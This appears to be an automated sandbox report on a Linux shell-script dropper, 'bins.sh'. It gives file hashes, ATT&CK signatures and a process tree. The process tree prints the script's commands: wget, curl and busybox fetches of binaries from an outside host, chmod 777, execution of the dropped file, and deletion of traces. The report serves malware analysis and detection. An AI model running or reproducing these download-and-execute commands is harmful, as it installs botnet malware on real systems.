Analysis
-
max time kernel
149s -
max time network
34s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 23:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
b30009d4f929515b1d4d21e5b8480729
-
SHA1
02ef65fbcdd9b783b6fb4d7adc4ed65eecf2ea9a
-
SHA256
7036896d4996457f19dc4b5cc17feba30d708f4ff114bcdbafd7c23db81b5c78
-
SHA512
d4249b37b5db462a0a9e968183a9c5ed4697313cf9e69d590e50f50046f9866f6653341c165ce843c182ff8ce93f4972025a85b7d313c4ff9a41c5ffee596dcc
-
SSDEEP
192:PKmHYgEwV7Gd+rFFozvR+q6n8wXuq6n8wl0FFozvpKmHYgqVD:PKmHYgEwV7Gd+8c0JKmHYgqVD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 674 chmod -
Executes dropped EXE 1 IoCs
Processes:
0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0gioc pid process /tmp/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g 675 0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlbusyboxwgetcurlwgetpid process 655 curl 673 busybox 678 wget 681 curl 649 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curldescription ioc process File opened for modification /tmp/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:642
-
/bin/rm/bin/rm bins.sh2⤵PID:644
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵
- System Network Configuration Discovery
PID:649 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:655 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵
- System Network Configuration Discovery
PID:673 -
/bin/chmodchmod 777 0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵
- File and Directory Permissions Modification
PID:674 -
/tmp/0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g./0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵
- Executes dropped EXE
PID:675 -
/bin/rmrm 0NUajqeMK5l4FFOFyA6NdXM5Hlnbs1eQ0g2⤵PID:677
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/N0WpZ788ZA9qRr5eotYvSVGCHDJtPLX6A52⤵
- System Network Configuration Discovery
PID:678 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/N0WpZ788ZA9qRr5eotYvSVGCHDJtPLX6A52⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:681
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52